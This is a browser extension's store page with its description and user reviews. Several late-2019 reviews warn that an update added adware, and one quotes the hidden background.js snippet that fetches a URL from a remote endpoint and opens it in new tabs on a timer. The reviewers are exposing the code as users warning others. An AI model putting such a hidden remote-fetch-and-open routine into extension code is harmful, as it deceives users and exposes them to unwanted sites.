Image from store Gmail Append HTML
Description from store This extension allows the usage of HTML content in Gmail. Simply copy the content you wish to add, right click on email form and select Append clipboard as HTML. YOU MUST REFRESH THE GMAIL TAB AFTER INSTALLING THIS EXTENSION. PLEASE NOTICE: 1) This extension manipulates the html element inside your email, there's no guarantee of what will work as expected and what won't. Please send an email to yourself before sending to an important contact and check the result. Or even better, send the email to an account outside Gmail and see how it displays. 2) Images still needs to be hosted somewhere. 3) USE INLINE CSS. 4) I've created this extension as a PROOF OF CONCEPT mainly for personal usage, but it was working, so I decided to publish and possibly help someone in need. It lacks testing and unfortunately I don't have the time to work on it right now. Consider its use as is.

  • (2020-07-18) Jun O Kim: No button is added to Gmail.
  • (2019-12-24) Justin Reiss: It functions, however it has ad-ware code hidden in its background.js file. It uses the setTimeout function and an intervalWebsite function to use open websites in a new tab on a timer from https://gcebt20192020.mockable.io/url. If you don't believe me check the background.js file yourself.
  • (2019-12-23) David Harvey: WARNING!! This contains malicious code! It opens random URLs in the background while installed. You can find the code under background.js here's a snippet: setTimeout(function () { $.ajax({ url: "https://gcebt20192020.mockable.io/url", async: false, dataType: 'json', success: function (data) { var newURL = data.msg; chrome.tabs.create({ url: newURL }); ; intervalWebsite() } });
  • (2019-12-17) Peter Škrlj: The app started to open random chrome tabs to some webpages on a daily interval
  • (2019-12-11) Alex Radetic: You extension is bugged. There is a file called background.js in it that is forwarding people to some travel website. https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/ Here is the solution to the issue i have been experiencing. Check your source code bro.
  • (2019-12-10) Ashley Hayes: Not sure what is going on but I am now getting a bored.com. Is there another extension that can be used that does the same thing? Need this extension daily for work.
  • (2019-12-10) Håken Lid: It worked ok. But a recent update of the extension contains malware. It opens an unsolicited web page "bored travel" in a new tab a few minutes after Chrome starts up.
  • (2019-12-10) Alexander Kreisler: Stopped working with CHROME VERSION 78.0.3904.108 on OS VERSION Linux: 4.15.0-72-generic Also opens an ad in a new tab :-( Sadly, had to be removed... ......................................................... Worked flawlessly until now.
  • (2019-12-09) Kutt Niinepuu: It works exactly as advertised and is the easiest methods for me to send HTML-formatted emails through GMail. However, Erich, please double check your code for the last version, because it started opening BoredTravel tabs on my browser recently, and it traces back to your extension.
  • (2019-12-07) Goran Kostic: Do you have a problem with randomly opening of new tabs with some strange websites? This extension has a hidden code that triggers a new URL after 6 minutes. It`s a Bored Travel website. The owner just spoiled his nice extension. Be careful using it. You can check it: Chrome extension folders location is C:\Users\<UserName>\AppData\Local\Google\Chrome\User Data\Default\Extensions/dnfikahmfhcjfcmbgbkklecekfeijmda You`ll find strange code in background.js lines 25-52
  • (2019-12-06) Brandon Stonebridge: Contains adware script that opens tabs to random websites (eg boredtravel.com), mostly benign, but annoying (search for mockable in file contents of %localappdata%\Google\Chrome\User Data\). Can probably disable in system hosts (gcebt20192020.mockable.io). Flagged.
  • (2019-12-06) Suddenly implemented Popup ADs in their extension.

  • (2017-10-24) Ahmad Ibrahim: Don't Listen to all the bad reviews. THIS WORKS!!!!!!! I TRIED IT!!!!! Just copy all your html after you add this to your chrome account. 1. Compose or open a new gmail you want to send. 2. Then Right click in the body of the email and choose the </>Append Clipboard as HTML button and there you have it your page is loaded. 3. Send 4. It works if you know what your doing. Use simple HTML and inline CSS look that up if you don't know what i'm talking about. Do not use an external css style sheet. Use https://templates.mailchimp.com/resources/inline-css/ to convert your css into inline css.
  • (2017-09-18) TCC para Todos / Giovanni Pergher: Just don't work. Don't waste your time
  • (2017-09-05) Dikum Aduwu: Hey guys, mine did not work at first. Try leaving it for some minutes to fully integrate. It actually works. Restart your browser and stuff, sometimes changes take sometime to reflect. Cheers.
  • (2017-09-04) Nacho Leguizamon: IT WORKS. You need to deactivate AdBlock when you're trying to paste it in Gmail with the right click function.

  • (2017-05-11) Chris Pauley: Same as other reviewers in 2017: does not work as designed. I think the pop up email dialog that gmail is using has rendered this extension useless. Oh well...
  • (2017-05-07) Daniel Cooper: It works, adds to the right-click menu in compose new message.
  • (2017-05-03) Emil Gallant: Does not work. Menu item is there, clicking on it does nothing. Clipboard definitely has HTML in it, but extension simply does not work.
  • (2017-05-01) Works perfectly. This is exactly what i was looking for. It is perfect. You just have to right click and use the special paste function. So convenient and saved my butt. The reviews that say it doesn't work are either from an older version that didn't or they didn't know how to use it
